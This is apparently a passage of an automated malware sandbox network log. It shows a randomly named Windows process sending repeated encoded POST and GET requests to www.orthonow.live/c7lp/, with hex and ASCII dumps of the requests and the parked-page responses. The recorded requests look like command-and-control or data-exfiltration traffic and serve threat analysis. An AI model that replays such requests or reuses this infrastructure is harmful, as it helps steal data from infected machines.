32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:35:45.512824059 CEST518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2EzNTk1OGMtMDQxOC00NDk3LWI2YWYtM2ZhNjkwOWI1MTZjIiwicGFnZV90aW1lIjoxNzIwMDIwOTQ1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.11.2049783199.59.243.226807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:48.040883064 CEST1125OUTPOST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 4e 62 46 30 67 51 34 72 33 2b 43 4b 49 73 66 52 58 32 73 2f 37 46 42 4d 37 30 63 30 78 59 54 4a 4e 7a 2f 62 48 46 32 65 70 44 42 51 4a 6b 2f 39 4c 34 53 4e 6c 62 67 6c 43 49 79 51 72 59 2f 4f 73 67 49 67 45 57 4d 68 6a 5a 59 30 58 5a 75 47 75 55 5a 52 37 4f 31 71 6b 74 69 42 54 6c 59 4e 36 58 77 6d 33 42 44 43 32 63 64 72 7a 78 51 42 77 36 4f 65 4a 4d 2b 35 53 33 5a 46 75 6d 33 72 77 5a 46 79 52 75 59 37 50 4b 7a 35 5a 41 33 6f 4b 34 74 47 57 54 4d 35 53 46 48 31 53 78 50 34 7a 51 41 4c 41 75 4f 31 61 73 7a 34 2b 5a 4d 62 59 72 53 49 7a 30 35 74 4a 2f 74 75 48 4f 70 66 38 59 78 48 48 6c 4a 77 36 65 6e 68 70 63 6d 5a 4d 6f 67 4f 6b 4e 4e 6c 62 52 51 42 46 37 75 4c 54 48 42 4b 78 75 4e 50 41 42 4e 71 6c 2b 77 66 49 4f 34 6d 66 6e 73 6f 33 38 55 38 79 75 62 52 2b 73 59 6b 6b 44 43 44 51 63 70 6a 64 79 6e 6c 43 4e 44 68 77 58 72 78 32 6d 4e 43 6d 4a 71 58 75 6d 63 34 53 2b 55 77 74 5a 31 35 2f 6e 6e 6c 39 48 43 33 51 67 77 2f 39 7a 55 35 47 68 72 4e 38 59 73 7a 38 39 6f 4d 67 37 32 47 6b 75 33 [TRUNCATED]
                                                            Data Ascii: vX=NbF0gQ4r3+CKIsfRX2s/7FBM70c0xYTJNz/bHF2epDBQJk/9L4SNlbglCIyQrY/OsgIgEWMhjZY0XZuGuUZR7O1qktiBTlYN6Xwm3BDC2cdrzxQBw6OeJM+5S3ZFum3rwZFyRuY7PKz5ZA3oK4tGWTM5SFH1SxP4zQALAuO1asz4+ZMbYrSIz05tJ/tuHOpf8YxHHlJw6enhpcmZMogOkNNlbRQBF7uLTHBKxuNPABNql+wfIO4mfnso38U8yubR+sYkkDCDQcpjdynlCNDhwXrx2mNCmJqXumc4S+UwtZ15/nnl9HC3Qgw/9zU5GhrN8Ysz89oMg72Gku31l5tBzmwOF3eZLgeZ8iXEhsjQqOrXmJPL5GG5JmYs4ecKw0ouwrjpUXDc6XxzgU/IC82DemRoNyC+EYMIt7czUO8H3NoQBSF0ErZ1hovt/1vFcqu4PkhYiE/M11YoaLSNfcUM6hU7FW2MdH4uZ3VXv3UaTcCrDNOpLJP0JFJGeXaUd7k8wjE1DqGSLstI0QIwkAlP9iM=
                                                            Jul 3, 2024 17:35:48.180605888 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:47 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: a9bead28-745e-4f05-bb8e-578d10eb3aeb
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=a9bead28-745e-4f05-bb8e-578d10eb3aeb; expires=Wed, 03 Jul 2024 15:50:48 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 46 6b 38 32 32 6b 34 31 34 57 34 4c 45 79 30 57 75 65 49 2b 56 54 53 69 64 6f 58 6f 37 4a 57 69 51 51 70 4e 4c 34 77 64 71 72 6a 58 63 69 33 41 35 59 49 66 6e 64 67 54 59 55 50 4d 6e 53 70 42 34 34 36 59 2f 34 4b 36 2b 33 6d 67 67 51 6b 56 6b 79 6f 34 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:35:48.180619955 CEST518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTliZWFkMjgtNzQ1ZS00ZjA1LWJiOGUtNTc4ZDEwZWIzYWViIiwicGFnZV90aW1lIjoxNzIwMDIwOTQ4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.11.2049784199.59.243.226807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:50.712764978 CEST1289OUTPOST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 4e 62 46 30 67 51 34 72 33 2b 43 4b 49 73 66 52 58 32 73 2f 37 46 42 4d 37 30 63 30 78 59 54 4a 4e 7a 2f 62 48 46 32 65 70 44 4a 51 4f 53 72 39 4c 62 36 4e 6b 62 67 6c 42 49 7a 58 72 59 2f 50 73 67 51 6b 45 57 42 44 6a 61 67 30 5a 75 43 47 76 68 31 52 2b 4f 31 72 72 4e 69 50 58 6c 59 2f 36 58 4d 79 33 46 72 53 32 74 70 72 79 78 67 42 6e 35 57 66 42 38 2b 46 53 33 5a 5a 6c 47 33 64 77 5a 78 69 52 75 45 37 50 50 7a 35 62 79 50 6f 5a 5a 74 47 4f 54 4d 2b 63 6c 48 32 64 52 50 5a 7a 51 38 78 41 75 4f 50 61 74 6e 34 2b 61 45 62 5a 71 53 4c 79 55 35 74 41 66 74 68 44 4f 6c 54 38 59 63 43 48 6c 74 77 36 63 33 68 34 4d 6d 5a 4a 4a 67 4a 30 39 4e 6a 66 52 51 57 42 37 53 35 54 48 46 65 78 73 68 50 42 78 5a 71 6c 4e 59 66 4b 71 55 6d 63 48 73 75 36 63 55 76 38 4f 62 46 2b 73 49 53 6b 43 6a 32 51 61 46 6a 63 51 2f 6c 54 5a 58 67 32 33 72 7a 37 32 4e 62 31 5a 75 4c 75 6e 77 6b 53 2b 56 76 74 59 68 35 2f 58 33 6c 38 47 43 32 64 51 77 47 30 54 55 57 63 52 33 51 38 59 77 37 38 39 51 63 67 38 47 47 6b 4f 33 [TRUNCATED]
                                                            Data Ascii: vX=NbF0gQ4r3+CKIsfRX2s/7FBM70c0xYTJNz/bHF2epDJQOSr9Lb6NkbglBIzXrY/PsgQkEWBDjag0ZuCGvh1R+O1rrNiPXlY/6XMy3FrS2tpryxgBn5WfB8+FS3ZZlG3dwZxiRuE7PPz5byPoZZtGOTM+clH2dRPZzQ8xAuOPatn4+aEbZqSLyU5tAfthDOlT8YcCHltw6c3h4MmZJJgJ09NjfRQWB7S5THFexshPBxZqlNYfKqUmcHsu6cUv8ObF+sISkCj2QaFjcQ/lTZXg23rz72Nb1ZuLunwkS+VvtYh5/X3l8GC2dQwG0TUWcR3Q8Yw789Qcg8GGkO31wotC5WwDNXeHPgeo8iaVht3Ar/XXn5fL+WG6fWYoy+dD00ouwrvbUXHc9idz6GnIUbiDSGQjNyDgEYBot7kNUOhs3IQQAHh0Dv12xIvs71uTYqivPksUiEvcyGsoI/ONV8UT4BUwGW3JLygyZ3Jtv3NBTeCrGJvOZKTOTlBQcl7yK7kO/kYQLdiaBr5P2BsTxyl0rW7b4O0/bNODlldkCr6MJ4MFi7/S3gHT8AzLsm2WXdUR8mofevZsfGU6qQuNgG+BJ/IgWNmNYcAwtXfsf8AvR24ERxwq3BvkAYvB3TtMNKanVEeZgz8RGYEabmx128MFieDcTfsqIO6bs2LVz0YF3EnUnN4zC6GczZ0IWZ
                                                            Jul 3, 2024 17:35:50.712826014 CEST5156OUTData Raw: 30 49 43 75 35 42 48 65 51 6d 68 32 76 62 64 4f 6d 52 4c 39 4a 77 4c 6c 35 4e 6d 4a 2f 37 46 49 6a 57 53 36 69 6a 57 30 45 70 67 6c 6e 55 68 72 39 71 46 67 61 33 6b 69 62 4d 37 57 2f 6b 74 55 4d 65 6f 58 6c 64 73 7a 4c 64 7a 6a 50 55 56 64 2b 4d
                                                            Data Ascii: 0ICu5BHeQmh2vbdOmRL9JwLl5NmJ/7FIjWS6ijW0EpglnUhr9qFga3kibM7W/ktUMeoXldszLdzjPUVd+Mh8o+VdSAI+hqpq2JV7zw4VZmicKVgyT1N9sh11E3BYpFYcf5C8HalXvIidxa5esAjWP3GY+qbvn8NlrasbUJCxrrGhWHt79bhMK4dPydlfvrlXn9VEtZ395Rx1XAwyP3OirgwHG0AwSTsg/TEPVqW7leHHDvgFYAP
                                                            Jul 3, 2024 17:35:50.712877035 CEST6445OUTData Raw: 53 66 36 72 42 45 77 69 56 48 37 73 79 76 35 57 71 78 38 75 2f 57 4a 62 47 2f 76 65 78 78 4b 65 69 50 71 6d 4d 78 55 46 65 49 75 73 72 66 58 62 72 34 4f 76 68 6b 33 4f 4f 65 61 2b 71 6d 5a 2f 55 67 77 61 5a 2f 51 68 31 37 6c 4c 4b 71 37 6f 76 37
                                                            Data Ascii: Sf6rBEwiVH7syv5Wqx8u/WJbG/vexxKeiPqmMxUFeIusrfXbr4Ovhk3OOea+qmZ/UgwaZ/Qh17lLKq7ov71ri5XDx4Iu6OKAkBl2EQ1EQYnThloWMT3crGYugAYj7pMkWwn4L2rumREhijfccYUcqzfIvU8jlp7XyO9h9tnP9L3jYJl5p1dIrSk6iuJb8DhD/twfzzx523HK5rhZ/R9dLXdYFDl4VLeRQ/8DaH2ncbyykwVQGFQ
                                                            Jul 3, 2024 17:35:50.832034111 CEST2578OUTData Raw: 79 4a 44 2b 55 67 7a 52 6d 52 67 58 4e 70 47 6d 67 64 38 75 55 66 54 53 6a 5a 52 62 7a 45 31 62 4e 74 49 76 53 47 67 7a 31 43 4f 46 77 4c 48 37 31 75 34 61 43 6f 6b 46 4c 71 32 6a 34 6c 59 30 79 77 73 41 2f 36 2f 33 6c 65 79 55 54 4c 37 2f 76 46
                                                            Data Ascii: yJD+UgzRmRgXNpGmgd8uUfTSjZRbzE1bNtIvSGgz1COFwLH71u4aCokFLq2j4lY0ywsA/6/3leyUTL7/vFwkGGVM+jzB1ay5Ip4mK+Eik7qoMqJflkETnhZF30ktV6Kl7iSlOPV3lb4qnHPBi+nkyYIe6kwnQ7A4QTSen4sXEvpvd9eUzdjpmwEiPqvpjDIWMK5ItdPedM5NbJNXMsxdWp60+Zz2TEzWakDiUnIpzGQnVskC5r7
                                                            Jul 3, 2024 17:35:50.832091093 CEST2578OUTData Raw: 31 64 62 7a 31 57 68 63 4b 47 34 63 30 67 31 69 67 6d 4e 39 30 6b 52 43 70 78 69 32 52 33 34 4a 79 65 4a 47 69 67 68 2f 44 67 76 4a 65 44 32 69 69 49 68 6b 34 61 41 4c 43 6a 44 38 37 56 67 37 46 2f 37 47 79 78 50 6e 69 76 6f 43 52 33 34 74 42 4a
                                                            Data Ascii: 1dbz1WhcKG4c0g1igmN90kRCpxi2R34JyeJGigh/DgvJeD2iiIhk4aALCjD87Vg7F/7GyxPnivoCR34tBJunyT5+VMP1F7vjE6x+4f+Jmgxx0oTOUbFHu2UG9xMfM4jxq+c314hRoCJxwOi7DQ9X871AyHnNhjdies9y92fQqvgBjNSrW3VWks4sY8Z1/65GWOuHo/GY9FyICIKrixcidAh9MELA4uaQLq5Br3D3cFOVDVQLkgH
                                                            Jul 3, 2024 17:35:50.832134008 CEST1289OUTData Raw: 59 79 38 54 70 2b 42 75 73 4c 6b 30 4b 46 64 68 58 2b 6f 5a 42 34 6b 78 31 4d 62 62 49 45 4f 39 4f 58 54 47 69 31 37 67 30 56 58 48 72 39 36 75 78 61 6e 61 63 78 31 63 66 67 5a 6c 71 76 57 58 6d 37 54 4b 34 56 6a 75 33 7a 4d 31 39 4e 34 52 4d 31
                                                            Data Ascii: Yy8Tp+BusLk0KFdhX+oZB4kx1MbbIEO9OXTGi17g0VXHr96uxanacx1cfgZlqvWXm7TK4Vju3zM19N4RM1rBAVrD2NAf15W4rVAZ1aow6sZuLsRmMuQVSYoWBt0f5CXK/YpfH22qLa7k2zkwEeP5Zy+kj8zExW7LIiMjUvvJYT/Ntz45xDkDUlTK9Ii77JJ217xHAed2d3NpzrXQnvnTybrgoCxEbcTM/U+XV7kwjRbjKHwQN7g
                                                            Jul 3, 2024 17:35:50.832324982 CEST19335OUTData Raw: 68 34 48 47 67 58 48 78 68 6e 4b 58 57 65 5a 33 77 34 52 70 76 68 65 49 68 39 67 47 2f 6c 30 70 6a 64 44 42 63 62 71 2f 50 6d 30 4d 45 45 66 54 6d 6f 59 31 51 32 65 31 52 7a 57 43 70 36 58 65 61 56 70 63 65 6f 2b 6d 4d 45 73 62 4b 6a 67 78 69 4d
                                                            Data Ascii: h4HGgXHxhnKXWeZ3w4RpvheIh9gG/l0pjdDBcbq/Pm0MEEfTmoY1Q2e1RzWCp6XeaVpceo+mMEsbKjgxiMJwVj9F766ylvKDVF+VgUEfP90BAqXjKBu0PaPk8Y1ajlPrGceuqY3n5JDgphCZGxkxQb5Jk2Ihh2GIf9IyIiR8EPBlXaIdgDRMiDjlY6Oez5ucdI+gqqxbRWmwdYby1ThB3WXmPLZrSFs3qZHQEZj8UEEN7S3u1us
                                                            Jul 3, 2024 17:35:50.950958014 CEST3867OUTData Raw: 71 7a 70 4a 48 75 38 6b 6b 37 4d 61 6f 39 5a 4a 73 72 65 6b 53 4f 62 69 35 31 76 6f 55 56 47 62 51 61 59 63 6e 70 4b 79 4f 68 64 6f 65 4a 67 46 36 32 50 55 76 34 6d 61 48 45 33 63 53 33 56 42 35 32 48 76 74 78 47 71 63 56 6e 7a 6a 32 54 43 66 50
                                                            Data Ascii: qzpJHu8kk7Mao9ZJsrekSObi51voUVGbQaYcnpKyOhdoeJgF62PUv4maHE3cS3VB52HvtxGqcVnzj2TCfPWGG8aYlR0Ov/XbKDSwMlWrhwxpHMvUgJ0AazYyRZaqfys3kVDZsB3eKi3NMZYw9FCfztB12Q+PVwUKcUogTkPyn0IIl90tQByB0Q5MPI/gKWB2Jmzu9Bgxd0iyfBW2lVVPyQlrg8CegZNecVO/2qMbEnJMw8iMoEY
                                                            Jul 3, 2024 17:35:50.951003075 CEST1289OUTData Raw: 32 36 62 49 31 56 51 42 48 36 33 51 55 4b 77 44 49 70 73 54 5a 42 66 59 30 32 56 56 46 48 71 5a 67 39 36 2f 4c 38 56 5a 7a 69 4b 6e 56 36 6f 4d 66 52 38 54 79 65 4b 4b 77 43 6c 4f 32 52 50 65 54 56 51 4e 78 72 45 5a 78 64 5a 56 48 44 2f 45 66 59
                                                            Data Ascii: 26bI1VQBH63QUKwDIpsTZBfY02VVFHqZg96/L8VZziKnV6oMfR8TyeKKwClO2RPeTVQNxrEZxdZVHD/EfYzy0ffmuc30SDc52Uq7HOJ7BaNps+vMVwMFwpmnrls422WcRmuGQguE8zBaYmWDzGake3yGonPOX4RsPA5LQhGtrDhteFEfYW+R4x76rJC4XtQ8ctdNh0vKAyGlF/QI+rMKp10gOKBmef8NEy6nZ+uvEpZS95x2Jr9
                                                            Jul 3, 2024 17:35:50.951662064 CEST9696OUTData Raw: 4d 30 4e 30 6a 30 73 64 73 62 4d 38 75 72 55 4c 70 61 70 37 54 41 74 4d 70 5a 78 67 30 59 42 37 32 59 76 66 66 50 47 39 6e 7a 58 4c 50 34 73 4f 59 43 63 63 55 7a 64 70 48 6f 57 39 34 42 34 39 4f 6e 79 34 30 4e 6d 6a 4d 77 7a 55 71 71 42 73 46 4c
                                                            Data Ascii: M0N0j0sdsbM8urULpap7TAtMpZxg0YB72YvffPG9nzXLP4sOYCccUzdpHoW94B49Ony40NmjMwzUqqBsFLqaantIwulb7dfM2sclXGH2KuXrBuqHH4rU/k08JqhrTnRxmKJ1pGG2I3226drnMUIifk7lqbzUd17a0O39IUJ6fuwrcM6UErXdQ4Q/HZEiHs7ky4KBh2uVEpZ4nrW/k6sVbU65BUrvZR16t6PQo2Z2mboQGJrCSNT
                                                            Jul 3, 2024 17:35:51.092320919 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:50 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: ed1a68e7-3697-4277-ab11-ec9894f2b978
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=ed1a68e7-3697-4277-ab11-ec9894f2b978; expires=Wed, 03 Jul 2024 15:50:51 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 46 6b 38 32 32 6b 34 31 34 57 34 4c 45 79 30 57 75 65 49 2b 56 54 53 69 64 6f 58 6f 37 4a 57 69 51 51 70 4e 4c 34 77 64 71 72 6a 58 63 69 33 41 35 59 49 66 6e 64 67 54 59 55 50 4d 6e 53 70 42 34 34 36 59 2f 34 4b 36 2b 33 6d 67 67 51 6b 56 6b 79 6f 34 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:35:51.092334032 CEST518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWQxYTY4ZTctMzY5Ny00Mjc3LWFiMTEtZWM5ODk0ZjJiOTc4IiwicGFnZV90aW1lIjoxNzIwMDIwOTUxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.11.2049785199.59.243.226807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:53.379725933 CEST521OUTGET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:35:53.523156881 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:53 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1466
                                                            x-request-id: 87754135-223a-4427-b9c2-49bf14975299
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GBCzeUnU5TO+MREERbxCb4copKTT2ACdMEZ0YR6PCQKM4hwE0OK+fQkd1IqsiheKv0gcsYkqHA1LzQsE0kCJQQ==
                                                            set-cookie: parking_session=87754135-223a-4427-b9c2-49bf14975299; expires=Wed, 03 Jul 2024 15:50:53 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 42 43 7a 65 55 6e 55 35 54 4f 2b 4d 52 45 45 52 62 78 43 62 34 63 6f 70 4b 54 54 32 41 43 64 4d 45 5a 30 59 52 36 50 43 51 4b 4d 34 68 77 45 30 4f 4b 2b 66 51 6b 64 31 49 71 73 69 68 65 4b 76 30 67 63 73 59 6b 71 48 41 31 4c 7a 51 73 45 30 6b 43 4a 